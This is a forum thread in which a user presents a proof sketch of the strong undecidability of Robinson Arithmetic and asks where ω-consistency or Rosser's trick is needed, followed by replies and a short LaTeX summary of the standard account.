Below is a proof of one of the key steps in Godel's first incompleteness theorem. It appears to prove the theorem. However, it doesn't assume that T⋃Q is ω-consistent, which I have read is necessary for the proof to work. The alternative is to use Rosser's Trick to avoid needing to assume ω-consistency. But the proof doesn't do that either. This leads me to believe that my proof must have an invalid step in it that requires ω-consistency to validate it. But I cannot see where that would be required. That's probably because my grasp of the concept of ω-consistency is very new and very tenuous. I think my omission is probably in the part of the proof I've laid out in detail below. But it's possible that it lies somewhere else, like in the Representability Theorem or the couple of steps at the end. If anybody can help me identify where I have gone wrong, I would appreciate it.

Strong Undecidability of Q

For a collection S of sentences in formal language L, define: Cn(S) = {#(θ) : Sentence(θ) ⋀ (S⊢θ)} where #(F) denotes the Godel number of formula F and Sentence(ψ) means that ψ is a well-formed sentence in L. The strong undecidability of Q theorem states that for any L-theory T, if T⋃Q is consistent in L, then T is undecidable, by which we mean that Cn(T) is not recursive. Here Q denotes Robinson Arithmetic.

Proof

Assume T⋃Q is consistent in L and Cn(T⋃Q) is recursive (meaning that the relation that defines it as a subset of ω is recursive, aka μ-recursive). Because of the recursivity of Cn(T⋃Q), the Representability Theorem tells us that the relation it defines must be representable in Q, which means there must exist a formula BewT⋃Q in wff(LN) with one free variable, say c, such that, for any θ in wff(LN):

A. (#(θ)∈Cn(T⋃Q)) ⇒ (Q⊢BewT⋃Q[c:=#(θ)]) and
B. (#(θ)∉Cn(T⋃Q)) ⇒ (Q⊢¬BewT⋃Q[c:=#(θ)]).

Bew is short for the German word beweisbar, meaning provable. Note that representability of Cn(T⋃Q) is a bigger requirement than it might at first seem, as any wff must have finite length and, since both sets Cn(T⋃Q) and ω - Cn(T⋃Q) are infinite, this precludes BewT⋃Q from being a simple infinite list of all numbers in Cn(T⋃Q). BewT⋃Q doesn't have to be recursive, but it must be concise.

Now by the Diagonal Lemma, applied to the wff (¬BewT⋃Q), we know there exists a sentence G in wff(LN) such that:

1. Q ⊢ (G↔¬BewT⋃Q[c:=#(G)])

This appears to be a theorem saying that G is true in T iff it is not provable in T, which immediately arouses suspicion. Let us examine this formally:

2. T ⊢G [Hypothesis]
3. #(G)∈Cn(T) [from previous line, by definition of Cn(T)]
4. #(G)∈Cn(T⋃Q) [as Cn(T)⊂Cn(T⋃Q)]
5. Q ⊢BewT⋃Q[c:=#(G)] [from A. above]
6. Q ⊢¬G [from lines 1 and 5, via Modus Ponens]
7. T⋃Q ⊢¬G [as Q⊂T⋃Q]
8. T⋃Q ⊢G [from line 2, as T⊂T⋃Q]

Hence T⋃Q⊢(G→(G⋀¬G)), so if T⋃Q is consistent, we must have:

9. T⋃Q⊬G

However it then follows that:

10. #(G)∉Cn(T⋃Q) [from previous line, by definition of Cn(T⋃Q)]
11. Q ⊢¬BewT⋃Q[c:=#(G)] [from B. above]
12. Q ⊢G [by lines 1 and 11, via Modus Ponens]
13. T⋃Q ⊢G [from previous line, as Q⊂T⋃Q]

So we have (T⋃Q⊢G)⋀¬(T⋃Q⊢G), which is a contradiction outside T. Hence we must conclude that one of the assumptions we have made is false. If we insist on retaining the assumption of consistency then the only other available assumption is the one that Cn(T⋃Q) is recursive, so we must reject that assumption.
A bit more argument, which I've omitted here, shows that if Cn(T⋃Q) is not recursive then neither is Cn(T). That means that T is undecidable and if we assume T is axiomatisable then it follows that T is not complete.

2. Oct 26, 2012 Preno

Maybe it would be easier if you just put your questions concerning the proof of Godel's theorem in a single thread? Anyway, Rosser's trick is used in the proof of the Representability Theorem. Without Rosser's trick, you would get the Representability Theorem in the following form:

(#(θ)∈Cn(T⋃Q)) ⇒ (Q⊢BewT⋃Q[c:=#(θ)])
(#(θ)∉Cn(T⋃Q)) ⇒ ¬(Q⊢BewT⋃Q[c:=#(θ)])

rather than in the form that you use:

(#(θ)∈Cn(T⋃Q)) ⇒ (Q⊢BewT⋃Q[c:=#(θ)])
(#(θ)∉Cn(T⋃Q)) ⇒ (Q⊢¬BewT⋃Q[c:=#(θ)])

3. Oct 27, 2012 andrewkirk

Thanks Preno. I thought it might be in the Representability Theorem. I'll go and work through the version of the proof of that that I have, now, to see if I can find where either omega-consistency is used or Rosser's Trick is built in. If I have more questions I'll just start a thread called "Questions about Godel's Incompleteness Theorem" and put them there. I'd rename this thread to that but the OP is already locked. They lock posts quickly around here.
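For readers following the exchange, the standard textbook account of where ω-consistency enters Gödel's original argument (and what Rosser's predicate buys) is summarized below in the usual notation with a primitive recursive proof relation Prf; this is a generic sketch, not a quotation of either poster.

```latex
% Generic sketch, with Prf_T(x,y) the primitive recursive relation
% "x codes a T-proof of the formula coded by y" and Bew_T(y) := \exists x\, Prf_T(x,y).
\begin{enumerate}
  \item If $T \vdash G$, some numeral $\overline{n}$ codes a proof, so
        $Q \vdash \mathrm{Prf}_T(\overline{n}, \ulcorner G \urcorner)$ and hence
        $Q \vdash \mathrm{Bew}_T(\ulcorner G \urcorner)$; the fixed point
        $G \leftrightarrow \lnot \mathrm{Bew}_T(\ulcorner G \urcorner)$ then yields
        $T \vdash \lnot G$ (for $T$ extending $Q$), so plain consistency already
        rules this case out.
  \item If $T \nvdash G$, then for \emph{each} numeral $\overline{n}$ separately
        $Q \vdash \lnot \mathrm{Prf}_T(\overline{n}, \ulcorner G \urcorner)$.
        Passing from these infinitely many refutations to
        $T \nvdash \exists x\, \mathrm{Prf}_T(x, \ulcorner G \urcorner)$ is exactly
        where $\omega$-consistency is invoked: an $\omega$-inconsistent theory can
        prove the existential statement while refuting every numerical instance.
        Rosser's predicate avoids the assumption by comparing proof codes inside
        the formula itself.
\end{enumerate}
```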
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9604184627532959, "perplexity": 1488.2434374576858}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267160754.91/warc/CC-MAIN-20180924205029-20180924225429-00099.warc.gz"}